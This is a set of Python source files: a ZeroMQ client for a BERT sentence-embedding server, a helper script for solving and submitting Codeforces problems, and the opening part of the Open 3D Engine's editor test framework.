__init__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <artex.xh@gmail.com> <https://hanxiao.github.io>
import sys
import threading
import time
import uuid
import warnings
from collections import namedtuple
from functools import wraps
import numpy as np
import zmq
from zmq.utils import jsonapi
__all__ = ['__version__', 'BertClient', 'ConcurrentBertClient']
# in the future client version must match with server version
__version__ = '1.9.2'
if sys.version_info >= (3, 0):
from ._py3_var import *
else:
from ._py2_var import *
_Response = namedtuple('_Response', ['id', 'content'])
Response = namedtuple('Response', ['id', 'embedding', 'tokens'])
class BertClient(object):
def __init__(self, ip='localhost', port=5555, port_out=5556,
output_fmt='ndarray', show_server_config=False,
identity=None, check_version=True, check_length=True,
check_token_info=True, ignore_all_checks=False,
timeout=-1):
""" A client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
You can also use it as a context manager:
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
bc.encode(...)
# bc is automatically closed out of the context
:type timeout: int
:type check_version: bool
:type check_length: bool
:type check_token_info: bool
:type ignore_all_checks: bool
:type identity: str
:type show_server_config: bool
:type output_fmt: str
:type port_out: int
:type port: int
:type ip: str
:param ip: the ip address of the server
:param port: port for pushing data from client to server, must be consistent with the server side config
:param port_out: port for publishing results from server to client, must be consistent with the server side config
:param output_fmt: the output format of the sentence embeddings, either a numpy array or a python List[List[float]] (ndarray/list)
:param show_server_config: whether to show server configs when first connected
:param identity: the UUID of this client
:param check_version: check if server has the same version as client, raise AttributeError if not the same
:param check_length: check that sentences are no longer than the server's `max_seq_len` before sending
:param check_token_info: check if server can return tokenization
:param ignore_all_checks: ignore all checks, set it to True if you are not sure whether the server is ready when constructing BertClient()
:param timeout: set the timeout (milliseconds) for receive operation on the client, -1 means no timeout and wait until result returns
"""
self.context = zmq.Context()
self.sender = self.context.socket(zmq.PUSH)
self.sender.setsockopt(zmq.LINGER, 0)
self.identity = identity or str(uuid.uuid4()).encode('ascii')
self.sender.connect('tcp://%s:%d' % (ip, port))
self.receiver = self.context.socket(zmq.SUB)
self.receiver.setsockopt(zmq.LINGER, 0)
self.receiver.setsockopt(zmq.SUBSCRIBE, self.identity)
self.receiver.connect('tcp://%s:%d' % (ip, port_out))
self.request_id = 0
self.timeout = timeout
self.pending_request = set()
self.pending_response = {}
if output_fmt == 'ndarray':
self.formatter = lambda x: x
elif output_fmt == 'list':
self.formatter = lambda x: x.tolist()
else:
raise AttributeError('"output_fmt" must be "ndarray" or "list"')
self.output_fmt = output_fmt
self.port = port
self.port_out = port_out
self.ip = ip
self.length_limit = 0
self.token_info_available = False
if not ignore_all_checks and (check_version or show_server_config or check_length or check_token_info):
s_status = self.server_status
if check_version and s_status['server_version'] != self.status['client_version']:
raise AttributeError('version mismatch! server version is %s but client version is %s!\n'
'consider "pip install -U bert-serving-server bert-serving-client"\n'
'or disable version-check by "BertClient(check_version=False)"' % (
s_status['server_version'], self.status['client_version']))
if check_length:
if s_status['max_seq_len'] is not None:
self.length_limit = int(s_status['max_seq_len'])
else:
self.length_limit = None
if check_token_info:
self.token_info_available = bool(s_status['show_tokens_to_client'])
if show_server_config:
self._print_dict(s_status, 'server config:')
def close(self):
"""
Gently close all connections of the client. If you are using BertClient as context manager,
then this is not necessary.
"""
self.sender.close()
self.receiver.close()
self.context.term()
def _send(self, msg, msg_len=0):
self.request_id += 1
self.sender.send_multipart([self.identity, msg, b'%d' % self.request_id, b'%d' % msg_len])
self.pending_request.add(self.request_id)
return self.request_id
def _recv(self, wait_for_req_id=None):
try:
while True:
# a request has been returned and found in pending_response
if wait_for_req_id in self.pending_response:
response = self.pending_response.pop(wait_for_req_id)
return _Response(wait_for_req_id, response)
# receive a response
response = self.receiver.recv_multipart()
request_id = int(response[-1])
# if not wait for particular response then simply return
if not wait_for_req_id or (wait_for_req_id == request_id):
self.pending_request.remove(request_id)
return _Response(request_id, response)
elif wait_for_req_id != request_id:
self.pending_response[request_id] = response
# wait for the next response
except Exception as e:
raise e
finally:
if wait_for_req_id in self.pending_request:
self.pending_request.remove(wait_for_req_id)
def _recv_ndarray(self, wait_for_req_id=None):
request_id, response = self._recv(wait_for_req_id)
arr_info, arr_val = jsonapi.loads(response[1]), response[2]
X = np.frombuffer(_buffer(arr_val), dtype=str(arr_info['dtype']))
return Response(request_id, self.formatter(X.reshape(arr_info['shape'])), arr_info.get('tokens', ''))
@property
def status(self):
"""
Get the status of this BertClient instance
:rtype: dict[str, str]
:return: a dictionary contains the status of this BertClient instance
"""
return {
'identity': self.identity,
'num_request': self.request_id,
'num_pending_request': len(self.pending_request),
'pending_request': self.pending_request,
'output_fmt': self.output_fmt,
'port': self.port,
'port_out': self.port_out,
'server_ip': self.ip,
'client_version': __version__,
'timeout': self.timeout
}
def _timeout(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
if 'blocking' in kwargs and not kwargs['blocking']:
# override client timeout setting if `func` is called in non-blocking way
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
else:
self.receiver.setsockopt(zmq.RCVTIMEO, self.timeout)
try:
return func(self, *args, **kwargs)
except zmq.error.Again as _e:
t_e = TimeoutError(
'no response from the server (with "timeout"=%d ms), please check the following: '
'is the server still online? is the network broken? are "port" and "port_out" correct? '
'are you encoding a huge amount of data whereas the timeout is too small for that?' % self.timeout)
if _py2:
raise t_e
else:
_raise(t_e, _e)
finally:
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
return arg_wrapper
@property
@_timeout
def server_status(self):
"""
Get the current status of the server connected to this client
:return: a dictionary contains the current status of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_CONFIG')
return jsonapi.loads(self._recv(req_id).content[1])
@_timeout
def encode(self, texts, blocking=True, is_tokenized=False, show_tokens=False):
""" Encode a list of strings to a list of vectors
`texts` should be a list of strings, each of which represents a sentence.
If `is_tokenized` is set to True, then `texts` should be list[list[str]],
the outer list represents sentences and each inner list represents the tokens in one sentence.
Note that if `blocking` is set to False, then you need to fetch the result manually afterwards.
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
# encode untokenized sentences
bc.encode(['First do it',
'then do it right',
'then do it better'])
# encode tokenized sentences
bc.encode([['First', 'do', 'it'],
['then', 'do', 'it', 'right'],
['then', 'do', 'it', 'better']], is_tokenized=True)
:type is_tokenized: bool
:type show_tokens: bool
:type blocking: bool
:type timeout: int
:type texts: list[str] or list[list[str]]
:param is_tokenized: whether the input texts are already tokenized
:param show_tokens: whether to include tokenization result from the server. If true, the return of the function will be a tuple
:param texts: list of sentences to be encoded; larger lists give better efficiency
:param blocking: wait until the encoded result is returned from the server. If false, will immediately return.
:param timeout: throw a timeout error when the encoding takes longer than the predefined timeout.
:return: encoded sentence/token-level embeddings, rows correspond to sentences
:rtype: numpy.ndarray or list[list[float]]
"""
if is_tokenized:
self._check_input_lst_lst_str(texts)
else:
self._check_input_lst_str(texts)
if self.length_limit is None:
warnings.warn('server does not put a restriction on "max_seq_len", '
'it will determine "max_seq_len" dynamically according to the sequences in the batch. '
'you can restrict the sequence length on the client side for better efficiency')
elif self.length_limit and not self._check_length(texts, self.length_limit, is_tokenized):
warnings.warn('some of your sentences have more tokens than "max_seq_len=%d" set on the server, '
'as a consequence you may get less-accurate or truncated embeddings.\n'
'here is what you can do:\n'
'- disable the length-check by creating a new "BertClient(check_length=False)" '
'when you do not want to display this warning\n'
'- or, start a new server with a larger "max_seq_len"' % self.length_limit)
req_id = self._send(jsonapi.dumps(texts), len(texts))
if not blocking:
return None
r = self._recv_ndarray(req_id)
if self.token_info_available and show_tokens:
return r.embedding, r.tokens
elif not self.token_info_available and show_tokens:
warnings.warn('"show_tokens=True", but the server does not support showing tokenization info to clients.\n'
'here is what you can do:\n'
'- start a new server with "bert-serving-start -show_tokens_to_client ..."\n'
'- or, use "encode(show_tokens=False)"')
return r.embedding
def fetch(self, delay=.0):
""" Fetch the encoded vectors from server, use it with `encode(blocking=False)`
Use it after `encode(texts, blocking=False)`. If there are no pending requests, the generator yields nothing.
Note that `fetch()` does not preserve the order of the requests! Say you have two non-blocking requests,
R1 and R2, where R1 has 256 samples and R2 has 1 sample. It could be that R2 returns first.
To fetch all results in the original sending order, please use `fetch_all(sort=True)`
:type delay: float
:param delay: delay in seconds and then run fetcher
:return: a generator that yields request id and encoded vector in a tuple, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
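Example of non-blocking encoding followed by fetching (a minimal sketch; the sentences are illustrative):
.. highlight:: python
.. code-block:: python
    with BertClient() as bc:
        bc.encode(['First do it'], blocking=False)
        bc.encode(['then do it right'], blocking=False)
        for r in bc.fetch():
            print(r.id, r.embedding.shape)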
"""
time.sleep(delay)
while self.pending_request:
yield self._recv_ndarray()
def fetch_all(self, sort=True, concat=False):
""" Fetch all encoded vectors from server, use it with `encode(blocking=False)`
Use it after `encode(texts, blocking=False)`. If there are no pending requests, it will return None.
:type sort: bool
:type concat: bool
:param sort: sort results by their request ids. It should be True if you want to preserve the sending order
:param concat: concatenate all results into one ndarray
:return: encoded sentence/token-level embeddings in sending order
:rtype: numpy.ndarray or list[list[float]]
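For example, to collect all pending results in sending order as one array (a minimal sketch; the sentences are illustrative):
.. highlight:: python
.. code-block:: python
    with BertClient() as bc:
        for batch in [['First do it'], ['then do it right']]:
            bc.encode(batch, blocking=False)
        vecs = bc.fetch_all(sort=True, concat=True)  # single ndarray, rows follow the sending order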
"""
if self.pending_request:
tmp = list(self.fetch())
if sort:
tmp = sorted(tmp, key=lambda v: v.id)
tmp = [v.embedding for v in tmp]
if concat:
if self.output_fmt == 'ndarray':
tmp = np.concatenate(tmp, axis=0)
elif self.output_fmt == 'list':
tmp = [vv for v in tmp for vv in v]
return tmp
def encode_async(self, batch_generator, max_num_batch=None, delay=0.1, **kwargs):
""" Async encode batches from a generator
:param delay: delay in seconds and then run fetcher
:param batch_generator: a generator that yields list[str] or list[list[str]] (for `is_tokenized=True`) every time
:param max_num_batch: stop after encoding this number of batches
:param `**kwargs`: the rest parameters please refer to `encode()`
:return: a generator that yields encoded vectors in ndarray, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
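A minimal sketch (the batch generator below is illustrative):
.. highlight:: python
.. code-block:: python
    def batches():
        for _ in range(3):
            yield ['First do it', 'then do it right']
    with BertClient() as bc:
        for r in bc.encode_async(batches(), max_num_batch=3, delay=0.5):
            print(r.id, r.embedding.shape)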
"""
def run():
cnt = 0
for texts in batch_generator:
self.encode(texts, blocking=False, **kwargs)
cnt += 1
if max_num_batch and cnt == max_num_batch:
break
t = threading.Thread(target=run)
t.start()
return self.fetch(delay)
@staticmethod
def _check_length(texts, len_limit, tokenized):
if tokenized:
# texts is already tokenized as list of str
return all(len(t) <= len_limit for t in texts)
else:
# do a simple whitespace tokenizer
return all(len(t.split()) <= len_limit for t in texts)
@staticmethod
def _check_input_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"%s" must be %s, but received %s' % (texts, type([]), type(texts)))
if not len(texts):
raise ValueError(
'"%s" must be a non-empty list, but received %s with %d elements' % (texts, type(texts), len(texts)))
for idx, s in enumerate(texts):
if not isinstance(s, _str):
raise TypeError('all elements in the list must be %s, but element %d is %s' % (type(''), idx, type(s)))
if not s.strip():
raise ValueError(
'all elements in the list must be non-empty string, but element %d is %s' % (idx, repr(s)))
if _py2:
texts[idx] = _unicode(texts[idx])
@staticmethod
def _check_input_lst_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"texts" must be %s, but received %s' % (type([]), type(texts)))
if not len(texts):
raise ValueError(
'"texts" must be a non-empty list, but received %s with %d elements' % (type(texts), len(texts)))
for s in texts:
BertClient._check_input_lst_str(s)
@staticmethod
def _print_dict(x, title=None):
if title:
print(title)
for k, v in x.items():
print('%30s\t=\t%-30s' % (k, v))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class BCManager():
def __init__(self, available_bc):
self.available_bc = available_bc
self.bc = None
def __enter__(self):
self.bc = self.available_bc.pop()
return self.bc
def __exit__(self, *args):
self.available_bc.append(self.bc)
class ConcurrentBertClient(BertClient):
def __init__(self, max_concurrency=10, **kwargs):
""" A thread-safe client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `check_version=False` and `check_length=False`
:type max_concurrency: int
:param max_concurrency: the maximum number of concurrent connections allowed
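A minimal sketch of sharing one client across threads (the thread count and sentence are illustrative):
.. highlight:: python
.. code-block:: python
    from threading import Thread
    bc = ConcurrentBertClient(max_concurrency=4)
    def worker():
        vec = bc.encode(['First do it'])  # borrows one pooled BertClient for the duration of the call
        print(vec.shape)
    threads = [Thread(target=worker) for _ in range(4)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()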
"""
try:
from bert_serving.client import BertClient
except ImportError:
raise ImportError('BertClient module is not available, it is required for serving HTTP requests. '
'Please use "pip install -U bert-serving-client" to install it. '
'If you do not want to use it as an HTTP server, '
'then remove "-http_port" from the command line.')
self.available_bc = [BertClient(**kwargs) for _ in range(max_concurrency)]
self.max_concurrency = max_concurrency
def close(self):
for bc in self.available_bc:
bc.close()
def _concurrent(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
try:
with BCManager(self.available_bc) as bc:
f = getattr(bc, func.__name__)
r = f if isinstance(f, dict) else f(*args, **kwargs)
return r
except IndexError:
raise RuntimeError('Too many concurrent connections! '
'Try to increase the value of "max_concurrency", '
'currently =%d' % self.max_concurrency)
return arg_wrapper
@_concurrent
def encode(self, **kwargs):
pass
@property
@_concurrent
def server_status(self):
pass
@property
@_concurrent
def status(self):
pass
def fetch(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def fetch_all(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def encode_async(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
fast_solve.py
import argparse
import os
import subprocess
import threading
from common.parse import parse_problem
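# Picks the next unused '<problem letter><NNN>.cpp' filename inside the destination directory.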
def get_dest_file(problem, destination):
dest_dir = os.path.abspath(destination)
os.makedirs(dest_dir, exist_ok=True)
problem_code = problem.name[0].lower()
num = 0
while os.path.isfile(os.path.join(dest_dir, '{}{:03}.cpp'.format(problem_code, num))):
num += 1
return os.path.join(dest_dir, '{}{:03}.cpp'.format(problem_code, num))
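# Streams `src` into `dst` line by line; skip() copies up to a marker line and add_text() injects extra
# (optionally comment-prefixed) text at the current position. Used by init_slide() below.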
class TextRewriter:
def __init__(self, src):
self.src = src
self.line_iter = iter(src.splitlines(True))
self.line = next(self.line_iter)
self.dst = ""
def next(self):
self.dst += self.line
self.line = next(self.line_iter, None)
def skip(self, dest, go_next=True):
while self.line.strip() != dest:
self.next()
if self.line is None:
return
if go_next:
self.next()
def add_text(self, text, prefix='// '):
for line in text.splitlines(True):
self.dst += prefix + line.strip() + '\n'
def init_slide(problem, dest_file):
subprocess.run(['slide', dest_file, 'init'])
with open(dest_file) as f:
src = f.read()
rewriter = TextRewriter(src)
rewriter.skip('/*!slide config')
rewriter.skip('*/')
rewriter.dst += '\n'
rewriter.add_text(problem.input)
rewriter.dst += '\n\n'
rewriter.add_text(problem.description)
rewriter.skip('//!slide end_input')
rewriter.add_text(problem.output)
rewriter.skip('/*!slide testdata')
rewriter.add_text('\n===\n'.join(map(str, problem.samples)), '')
rewriter.skip(None)
with open(dest_file, 'w') as f:
f.write(rewriter.dst)
def _do_start_slide_watch(dest_file, print_fail):
subprocess.run(['slide', dest_file, 'watch'] + (['--fail'] if print_fail else []))
def start_slide_watch(dest_file, print_fail):
thread = threading.Thread(target=_do_start_slide_watch, args=(dest_file, print_fail))
thread.start()
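# Each press of Enter submits the current solution file; Ctrl+C exits the loop.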
def submit_loop(problem, dest_file):
try:
while True:
input()
problem.submit(dest_file)
except KeyboardInterrupt:
pass
def main():
parser = argparse.ArgumentParser(description="Help to solve a CF problem fast")
parser.add_argument('url', help='URL of Problem')
parser.add_argument('--contin', '-c', help='Continue solving a problem')
parser.add_argument('--destination', '-d', default=os.getcwd(), help='Folder to save files')
parser.add_argument('--no-watch', '-w', action='store_true', help='Do not watch file')
parser.add_argument('--no-fail', '-f', action='store_true', help='Do not print fails')
parser.add_argument('--no-atom', '-a', action='store_true', help='Do not start atom')
args = parser.parse_args()
problem = parse_problem(args.url)
if not args.contin:
dest_file = get_dest_file(problem, args.destination)
init_slide(problem, dest_file)
else:
dest_dir = os.path.abspath(args.destination)
dest_file = os.path.join(dest_dir, args.contin)
print("Ready!")
if not args.no_atom:
subprocess.run(['atom', dest_file])
if not args.no_watch:
start_slide_watch(dest_file, not args.no_fail)
submit_loop(problem, dest_file)
if __name__ == '__main__':
main()
editor_test.py
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Test-writing utilities that simplify creating O3DE in-Editor tests in Python.
Test writers should subclass a test suite from EditorTestSuite to hold the specification of python test scripts for
the editor to load and run. Tests can be parallelized (run in multiple editor instances at once) and/or batched
(multiple tests run in the same editor instance), with collated results and crash detection.
Usage example:
class MyTestSuite(EditorTestSuite):
class MyFirstTest(EditorSingleTest):
from . import script_to_be_run_by_editor as test_module
class MyTestInParallel_1(EditorParallelTest):
from . import another_script_to_be_run_by_editor as test_module
class MyTestInParallel_2(EditorParallelTest):
from . import yet_another_script_to_be_run_by_editor as test_module
"""
from __future__ import annotations
import abc
import functools
import inspect
import json
import logging
import math
import os
import pytest
import re
import tempfile
import threading
import types
import warnings
import _pytest.python
import _pytest.outcomes
from _pytest.skipping import pytest_runtest_setup as skip_pytest_runtest_setup
import ly_test_tools.environment.process_utils as process_utils
import ly_test_tools.o3de.editor_test_utils as editor_utils
from ly_test_tools.o3de.asset_processor import AssetProcessor
from ly_test_tools.launchers.exceptions import WaitTimeoutError
__test__ = False # This file contains ready-to-use test functions which are not actual tests, avoid pytest collection
logger = logging.getLogger(__name__)
class EditorTest(abc.ABC):
"""
Abstract Test targeting the O3DE Editor. The following attributes can be overridden by the test writer:
"""
# Test file that this test will run, must be set by user for EditorTest to execute
test_module = None
# Maximum time to allow the editor to run, in seconds
timeout = 180
# Attach debugger when running the test, useful for debugging crashes. Should never be left True in production.
# Where possible, also recommended to switch to EditorSingleTest for better debugging in isolation.
attach_debugger = False
# Wait until a debugger is attached at the startup of the test, this is another way of debugging.
wait_for_debugger = False
class EditorSingleTest(EditorTest):
"""
Test that will run alone in one editor with no parallel editors, limiting environmental side-effects at the
expense of redundant isolated work
"""
def __init__(self):
# Extra cmdline arguments to supply to the editor for the test
self.extra_cmdline_args = []
# Whether to use null renderer, this will override use_null_renderer for the Suite if not None
self.use_null_renderer = None
@staticmethod
def setup(instance: EditorTestSuite.EditorTestClass, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_results: EditorTestSuite.TestData,
launcher_platform: str) -> None:
"""
User-overrideable setup function, which will run before the test.
:param instance: Parent EditorTestClass instance executing the test
:param request: PyTest request object
:param workspace: LyTestTools workspace manager
:param editor: LyTestTools editor-launcher object
:param editor_test_results: Currently recorded EditorTest results
:param launcher_platform: user-parameterized string for LyTestTools
"""
pass
@staticmethod
def wrap_run(instance: EditorTestSuite.EditorTestClass, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_results: EditorTestSuite.TestData,
launcher_platform: str) -> None:
"""
User-overrideable wrapper function, which will run both before and after test.
Any code before the 'yield' statement will run before the test; code after the yield runs after the test.
Setup will run before wrap_run starts. Teardown will run after it completes.
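Usage example (a sketch; the print calls stand in for real setup/teardown work):
    @staticmethod
    def wrap_run(instance, request, workspace, editor, editor_test_results, launcher_platform):
        print("runs before the editor test")
        yield
        print("runs after the editor test")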
:param instance: Parent EditorTestClass instance executing the test
:param request: PyTest request object
:param workspace: LyTestTools workspace manager
:param editor: LyTestTools editor-launcher object
:param editor_test_results: Currently recorded EditorTest results
:param launcher_platform: user-parameterized string for LyTestTools
"""
yield
@staticmethod
def teardown(instance: EditorTestSuite.EditorTestClass, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_results: EditorTestSuite.TestData,
launcher_platform: str) -> None:
"""
User-overrideable teardown function, which will run after the test
:param instance: Parent EditorTestClass instance executing the test
:param request: PyTest request object
:param workspace: LyTestTools workspace manager
:param editor: LyTestTools editor-launcher object
:param editor_test_results: Currently recorded EditorTest results
:param launcher_platform: user-parameterized string for LyTestTools
"""
pass
class EditorSharedTest(EditorTest):
"""
Test that will run in parallel with tests in different editor instances, as well as serially batching with other
tests in each editor instance. Minimizes total test run duration.
Does not support per test setup/teardown to avoid creating race conditions
"""
# Specifies if the test can be batched in the same editor
is_batchable = True
# Specifies if the test can be run in multiple editors in parallel
is_parallelizable = True
class EditorParallelTest(EditorSharedTest):
"""
Test that will run in parallel with tests in different editor instances, though not serially batched with other
tests in each editor instance. Reduces total test run duration, while limiting side-effects between tests.
Does not support per test setup/teardown to avoid creating race conditions
"""
is_batchable = False
is_parallelizable = True
class EditorBatchedTest(EditorSharedTest):
"""
Test that will run serially batched with the tests in the same editor instance, though not executed in parallel with
other editor instances. Reduces overhead from starting the Editor, while limiting side-effects between editors.
Does not support per test setup/teardown to avoid creating race conditions
"""
is_batchable = True
is_parallelizable = False
class Result:
class EditorTestResultException(Exception):
""" Indicates that an unknown result was found during the tests """
class ResultType(abc.ABC):
"""
Generic result-type for data shared among results
"""
@abc.abstractmethod
def __str__(self):
# type: () -> str
return ""
def get_output_str(self):
# type: () -> str
"""
Checks if the output attribute exists and returns it.
:return: Output string from running a test, or a no output message
"""
output = getattr(self, "output", None)
if output:
return output
else:
return "-- No output --"
def get_editor_log_str(self):
# type: () -> str
"""
Checks if the editor_log attribute exists and returns it.
:return: Either the editor_log string or a no output message
"""
log = getattr(self, "editor_log", None)
if log:
return log
else:
return "-- No editor log found --"
class Pass(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, editor_log: str):
"""
Represents a test success
:test_spec: The type of EditorTest
:output: The test output
:editor_log: The editor log's output
"""
self.test_spec = test_spec
self.output = output
self.editor_log = editor_log
def __str__(self):
output = (
f"Test Passed\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
)
return output
class Fail(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, editor_log: str):
"""
Represents a normal test failure
:test_spec: The type of EditorTest
:output: The test output
:editor_log: The editor log's output
"""
self.test_spec = test_spec
self.output = output
self.editor_log = editor_log
def __str__(self):
output = (
f"Test FAILED\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Crash(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, ret_code: int, stacktrace: str,
editor_log: str):
"""
Represents a test which failed with an unexpected crash
:test_spec: The type of EditorTest
:output: The test output
:ret_code: The test's return code
:stacktrace: The test's stacktrace if available
:editor_log: The editor log's output
"""
self.output = output
self.test_spec = test_spec
self.ret_code = ret_code
self.stacktrace = stacktrace
self.editor_log = editor_log
def __str__(self):
stacktrace_str = "-- No stacktrace data found --" if not self.stacktrace else self.stacktrace
output = (
f"Test CRASHED, return code {hex(self.ret_code)}\n"
f"---------------\n"
f"| Stacktrace |\n"
f"---------------\n"
f"{stacktrace_str}"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Timeout(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, time_secs: float, editor_log: str):
"""
Represents a test which failed due to freezing, hanging, or executing slowly
:test_spec: The type of EditorTest
:output: The test output
:time_secs: The timeout duration in seconds
:editor_log: The editor log's output
:return: The Timeout object
"""
self.output = output
self.test_spec = test_spec
self.time_secs = time_secs
self.editor_log = editor_log
def __str__(self):
output = (
f"Test ABORTED after not completing within {self.time_secs} seconds\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Unknown(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str = None, extra_info: str = None,
editor_log: str = None):
"""
Represents a failure that the test framework cannot classify
:test_spec: The type of EditorTest
:output: The test output
:extra_info: Any extra information as a string
:editor_log: The editor log's output
"""
self.output = output
self.test_spec = test_spec
self.editor_log = editor_log
self.extra_info = extra_info
def __str__(self):
output = (
f"Indeterminate test result interpreted as failure, possible cause: {self.extra_info}\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
@pytest.mark.parametrize("crash_log_watchdog", [("raise_on_crash", False)])
class EditorTestSuite:
# Extra cmdline arguments to supply for every editor instance for this test suite
global_extra_cmdline_args = ["-BatchMode", "-autotest_mode"]
# Tests usually run with no renderer, however some tests require a renderer and will disable this
use_null_renderer = True
# Maximum time in seconds for a single editor to stay open across the set of shared tests
timeout_editor_shared_test = 300
@staticmethod
def get_number_parallel_editors() -> int:
"""
Number of editors to run in parallel, this method can be overridden by the user.
Note: CLI option '--editors-parallel' takes precedence over class settings.
:return: count of parallel editors to run
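Usage example (a sketch that pins the count in a suite):
    class MyTestSuite(EditorTestSuite):
        @staticmethod
        def get_number_parallel_editors() -> int:
            return 4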
"""
count = 1
found_processors = os.cpu_count()
if found_processors:
# only schedule on half the cores since the application will also run multithreaded
# also compensates for hyperthreaded/clustered/virtual cores inflating this count
count = math.floor(found_processors / 2)
if count < 1:
count = 1
return count
_TIMEOUT_CRASH_LOG = 20 # Maximum time (seconds) for waiting for a crash file to finish being dumped to disk
_TEST_FAIL_RETCODE = 0xF # Return code for test failure
class TestData:
__test__ = False # Tell PyTest to skip collecting this even though it has "Test" in the name; avoids warnings.
def __init__(self):
self.results = {} # Dict of str(test_spec.__name__) -> Result.ResultType
self.asset_processor = None
@pytest.fixture(scope="class")
def editor_test_data(self, request: _pytest.fixtures.FixtureRequest) -> EditorTestSuite.TestData:
"""
Yields a per-class structure to store the data of each test result and an AssetProcessor object that will be
re-used on the whole suite
:request: The Pytest request object
:yield: The TestData object
"""
yield from self._editor_test_data(request)
def _editor_test_data(self, request: _pytest.fixtures.FixtureRequest) -> EditorTestSuite.TestData:
"""
A wrapped implementation to simplify unit testing pytest fixtures. Users should not call this directly.
:request: The Pytest request object (unused, but always passed by pytest)
:yield: The TestData object
"""
test_data = EditorTestSuite.TestData()
yield test_data # yield to pytest while test-class executes
# resumed by pytest after each test-class finishes
if test_data.asset_processor: # was assigned an AP to manage
test_data.asset_processor.stop(1)
test_data.asset_processor.teardown()
test_data.asset_processor = None
editor_utils.kill_all_ly_processes(include_asset_processor=True)
else: # do not interfere as a preexisting AssetProcessor may be owned by something else
editor_utils.kill_all_ly_processes(include_asset_processor=False)
class Runner:
def __init__(self, name, func, tests):
self.name = name
self.func = func
self.tests = tests
self.run_pytestfunc = None
self.result_pytestfuncs = []
class EditorTestClass(pytest.Class):
"""
Custom pytest collector which programmatically adds test functions based on data in the TestSuite class
"""
def collect(self):
"""
This collector does the following:
1) Iterates through all the EditorSingleTest subclasses defined inside the suite.
Adds a test function to the suite to run each separately, and report results
2) Iterates through all the EditorSharedTest subclasses defined inside the suite,
grouping tests based on their specs into 3 categories: batched, parallel and batched+parallel.
Each category gets a single test runner function registered to run all the tests of the category
A result function will be added for every individual test, which will pass/fail based on the results
from the previously executed runner function
"""
cls = self.obj
# Decorator function to add extra lookup information for the test functions
def set_marks(marks):
def spec_impl(func):
@functools.wraps(func)
def inner(*args, **argv):
return func(*args, **argv)
inner.marks = marks
return inner
return spec_impl
# Retrieve the test specs
single_tests = self.obj.get_single_tests()
shared_tests = self.obj.get_shared_tests()
batched_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=False, is_batchable=True)
parallel_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True, is_batchable=False)
parallel_batched_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True, is_batchable=True)
# user can provide CLI option to not parallelize/batch the tests
no_parallelize = self.config.getoption("--no-editor-parallel", default=False)
no_batch = self.config.getoption("--no-editor-batch", default=False)
if no_parallelize:
single_tests += parallel_tests
parallel_tests = []
batched_tests += parallel_batched_tests
parallel_batched_tests = []
if no_batch:
single_tests += batched_tests
batched_tests = []
parallel_tests += parallel_batched_tests
parallel_batched_tests = []
# Add the single tests, these will run separately
for test_spec in single_tests:
name = test_spec.__name__
def make_test_func(inner_test_spec):
@set_marks({"run_type": "run_single"})
def single_run(self, request, workspace, editor, editor_test_data, launcher_platform):
# only single tests are allowed to have setup/teardown, however we can have shared tests that
# were explicitly set as single, for example via cmdline argument override
is_single_test = issubclass(inner_test_spec, EditorSingleTest)
if is_single_test:
# Setup step for wrap_run
wrap = inner_test_spec.wrap_run(self, request, workspace, editor, editor_test_data, launcher_platform)
assert isinstance(wrap, types.GeneratorType), "wrap_run must return a generator, did you forget 'yield'?"
next(wrap, None)
# Setup step
